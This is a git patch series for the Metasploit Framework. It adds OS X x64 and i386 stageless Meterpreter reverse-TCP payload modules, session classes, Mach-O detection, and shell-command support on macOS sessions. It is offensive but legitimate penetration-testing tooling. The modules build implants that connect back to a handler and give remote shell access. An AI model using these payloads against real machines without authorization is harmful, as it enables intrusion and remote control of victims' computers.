From d333077308e865034571a46a3fe9375612c2a57b Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 23 May 2017 09:47:23 +0800 Subject: [PATCH 1/4] osx meterpreter --- lib/msf/base/sessions/meterpreter_x64_osx.rb | 29 ++++++++++++++ lib/msf/util/exe.rb | 28 ++++++++----- .../osx/x64/meterpreter_reverse_tcp.rb | 40 +++++++++++++++++++ 3 files changed, 87 insertions(+), 10 deletions(-) create mode 100644 lib/msf/base/sessions/meterpreter_x64_osx.rb create mode 100644 modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb diff --git a/lib/msf/base/sessions/meterpreter_x64_osx.rb b/lib/msf/base/sessions/meterpreter_x64_osx.rb new file mode 100644 index 000000000000..2e507e90550b --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_x64_osx.rb @@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'osx' + self.base_arch = ARCH_X64 + end +end + +end +end + diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index d41f3876e757..d05f043ed793 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -106,7 +106,7 @@ def self.to_zip(files) # @return [String] # @return [NilClass] def self.to_executable(framework, arch, plat, code = '', opts = {}) - if elf? code + if elf? code or macho? code return code end @@ -2122,15 +2122,19 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts) end end when 'macho', 'osx-app' - macho = case arch - when ARCH_X86,nil - to_osx_x86_macho(framework, code, exeopts) - when ARCH_X64 - to_osx_x64_macho(framework, code, exeopts) - when ARCH_ARMLE - to_osx_arm_macho(framework, code, exeopts) - when ARCH_PPC - to_osx_ppc_macho(framework, code, exeopts) + if macho? code + macho = code + else + macho = case arch + when ARCH_X86,nil + to_osx_x86_macho(framework, code, exeopts) + when ARCH_X64 + to_osx_x64_macho(framework, code, exeopts) + when ARCH_ARMLE + to_osx_arm_macho(framework, code, exeopts) + when ARCH_PPC + to_osx_ppc_macho(framework, code, exeopts) + end end fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho when 'vba' @@ -2258,6 +2262,10 @@ def self.elf?(code) code[0..3] == "\x7FELF" end + def self.macho?(code) + code[0..3] == "\xCF\xFA\xED\xFE" + end + end end end diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb new file mode 100644 index 000000000000..dbb741e67cf9 --- /dev/null +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -0,0 +1,40 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x64_osx' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'OSX Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_x64_OSX + ) + ) + end + + def generate + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec + end +end From a9e6df6f158b375ad2da721f467902df8bfdba34 Mon Sep 17 00:00:00 2001 From: Tim Date: Fri, 26 May 2017 15:55:14 +0800 Subject: [PATCH 2/4] fix shell command on osx meterpreter --- .../meterpreter/ui/console/command_dispatcher/stdapi/sys.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index acfe73732852..774617bcbe1d 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -257,7 +257,7 @@ def cmd_shell(*args) print_error( "Failed to spawn shell with thread impersonation. Retrying without it." ) cmd_execute("-f", path, "-c", "-H", "-i") end - when 'linux' + when 'linux', 'osx' # Don't expand_path() this because it's literal anyway path = "/bin/sh" cmd_execute("-f", path, "-c", "-i") From 1582d3a90261aa2e03d6f7e73dffbb98b48ba25e Mon Sep 17 00:00:00 2001 From: Tim Date: Fri, 26 May 2017 15:55:42 +0800 Subject: [PATCH 3/4] support i386 --- lib/msf/base/sessions/meterpreter_x86_osx.rb | 29 ++++++++++++++ .../osx/x86/meterpreter_reverse_tcp.rb | 40 +++++++++++++++++++ 2 files changed, 69 insertions(+) create mode 100644 lib/msf/base/sessions/meterpreter_x86_osx.rb create mode 100644 modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb diff --git a/lib/msf/base/sessions/meterpreter_x86_osx.rb b/lib/msf/base/sessions/meterpreter_x86_osx.rb new file mode 100644 index 000000000000..c7e25efac942 --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_x86_osx.rb @@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'osx' + self.base_arch = ARCH_X86 + end +end + +end +end + diff --git a/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb new file mode 100644 index 000000000000..756e3f5e738f --- /dev/null +++ b/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb @@ -0,0 +1,40 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x86_osx' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'OSX Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_x86_OSX + ) + ) + end + + def generate + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('i386-apple-darwin', generate_config(opts)).to_binary :exec + end +end From 32a83e0d30eeb4c8c2372d90620f2153d293dafe Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 30 May 2017 14:00:24 +0800 Subject: [PATCH 4/4] update macho check for 32bit + fat --- lib/msf/util/exe.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index d05f043ed793..9bbaba952ef4 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -2263,7 +2263,7 @@ def self.elf?(code) end def self.macho?(code) - code[0..3] == "\xCF\xFA\xED\xFE" + code[0..3] == "\xCF\xFA\xED\xFE" || code[0..3] == "\xCE\xFA\xED\xFE" || code[0..3] == "\xCA\xFE\xBA\xBE" end end